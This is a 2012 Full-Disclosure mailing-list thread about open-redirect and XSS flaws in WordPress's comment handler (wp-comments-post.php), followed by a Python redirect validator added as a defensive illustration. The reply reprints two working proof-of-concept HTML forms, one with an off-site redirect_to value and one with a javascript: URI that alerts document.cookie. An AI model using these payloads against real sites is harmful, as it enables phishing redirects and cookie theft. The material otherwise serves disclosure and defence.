Message-ID: <57db066ca90c62c007d1ae9fea2be4ec@intern0t.net>
Date: Sat, 05 May 2012 09:54:02 -0400
From: InterN0T Advisories <advisories@...ern0t.net>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Re: IAA, Redirector and XSS vulnerabilities in WordPress

Hi List,

To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have, for those that don't want to go there just to see the PoCs but would rather read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below.

Contents of Wordpress Redirector:

<html>
<head>
<title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@...t.test" />
<input type="hidden" name="comment" value="Test" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="http://awebsite.tld" />
</form>
</body>
</html>

--------------------------------------

Contents of Wordpress XSS:

<html>
<head>
<title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-comments-post.php" method="post">
<input type="hidden" name="author" value="Test" />
<input type="hidden" name="email" value="test@...t.test" />
<input type="hidden" name="comment" value="Test21" />
<input type="hidden" name="comment_post_ID" value="1" />
<input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" />
</form>
</body>
</html>

--------------------------------------

I don't really have any comments about these "exploits".
Best regards,
Nemesis 3.0

On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive@...security.com.ua> wrote:
> Hello list!
>
> I want to warn you about security vulnerabilities in WordPress.
>
> These are Insufficient Anti-automation, Redirector and Cross-Site Scripting
> vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are WordPress 2.0 - 3.3.1.
>
> ----------
> Details:
> ----------
>
> Already from WP 2.0 there are Insufficient Anti-automation, Redirector and
> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just when I
> began using WP in 2006. If the developers fixed vulnerabilities in the
> previous two redirectors in WP 2.3, then these vulnerabilities were not
> fixed even in WP 3.3.1.
>
> IAA (WASC-21):
>
> Lack of captcha in the comment form allows one to conduct automated attacks.
> The developers still haven't put a captcha in the WP comments form (from the
> first version of the engine), which besides IAA attacks, also allowed
> conducting Redirector and XSS attacks.
>
> By default in WordPress the premoderation is turned on, and also there is a
> built-in anti-spam filter. But if 10 years ago the premoderation would be
> enough, then long ago this mechanism couldn't be considered as sufficient
> protection against spam, and the anti-spam filter had an efficiency of less
> than 1% - it marked only a few of the spam messages as spam. And also these
> mechanisms don't protect against the below-mentioned attacks. Also the
> plugin Akismet is bundled with WP, which is "captcha-less" protection
> against spam. But by default it's turned off, and compared with captcha it's
> considered less efficient and also doesn't protect against the
> below-mentioned attacks.
>
> Redirector (URL Redirector Abuse) (WASC-38):
>
> Exploit:
>
> [Removed]
>
> XSS (WASC-08):
>
> Exploit:
>
> [Removed]
>
> XSS attack is possible on different browsers, but it's harder to conduct
> than in the case of the previous two redirectors (via data URI). At IIS web
> servers the redirect is going via Refresh header, and at other web servers -
> via Location header.
>
> Due to nuances of the work of this script (filtering of important symbols
> and adding of an anchor), for execution of JS code it's needed to use tricky
> bypass methods. This complexity exists both with the javascript URI and with
> the combo variant javascript URI + data URI.
>
> Reliable captcha protects against IAA, Redirector and XSS vulnerabilities.
>
> ------------
> Timeline:
> ------------
>
> 2012.04.26 - disclosed at my site
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
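As an added illustration (not code from either post, nor WordPress's own), the check the thread's redirect_to parameter lacks: a validator that accepts only same-site http(s) URLs or site-relative paths and falls back to the site root otherwise, so both the off-site redirect and the javascript:/data: URI variants discussed above are refused. The site host example.com and the fallback path "/" are assumed values.

```python
from urllib.parse import urlsplit

# Constructed values: a real deployment reads its own host from configuration.
SITE_HOST = "example.com"
FALLBACK = "/"

# Only these schemes may appear in an absolute redirect target.
ALLOWED_SCHEMES = {"http", "https"}


def safe_redirect_target(redirect_to: str,
                         site_host: str = SITE_HOST,
                         fallback: str = FALLBACK) -> str:
    """Return redirect_to if it is a same-site http(s) URL or a site-relative
    path; otherwise return the fallback so the user is never sent off-site
    or into a javascript:/data: URI."""
    if not redirect_to:
        return fallback

    # Drop control characters (tab, newline, ...) before parsing: some user
    # agents skip them when reading a scheme, so "java\tscript:" must not
    # slip past a check that only looks for the literal word "javascript".
    cleaned = "".join(ch for ch in redirect_to if ch.isprintable()).strip()
    parts = urlsplit(cleaned)
    scheme = parts.scheme.lower()

    # Any explicit scheme other than http/https is rejected (javascript:,
    # data:, vbscript:, ...). The PoC's javascript:alert%28...%29 lands here.
    if scheme and scheme not in ALLOWED_SCHEMES:
        return fallback

    if parts.netloc:
        # Absolute or protocol-relative ("//host/...") URL: the host must be
        # exactly our own. parts.hostname ignores userinfo and port, so
        # "https://example.com@evil.example/" resolves to evil.example.
        if (parts.hostname or "").lower() != site_host.lower():
            return fallback
        # A scheme-less "//example.com/..." is still same-site, so allow it.
        return cleaned

    # No host: require a site-relative path starting with a single "/".
    # "/\\evil.example" is rejected because some browsers treat "\" as "/"
    # and would navigate off-site; "http:evil" (scheme, no host) also fails.
    if not cleaned.startswith("/") or cleaned.startswith("/\\"):
        return fallback
    return cleaned
```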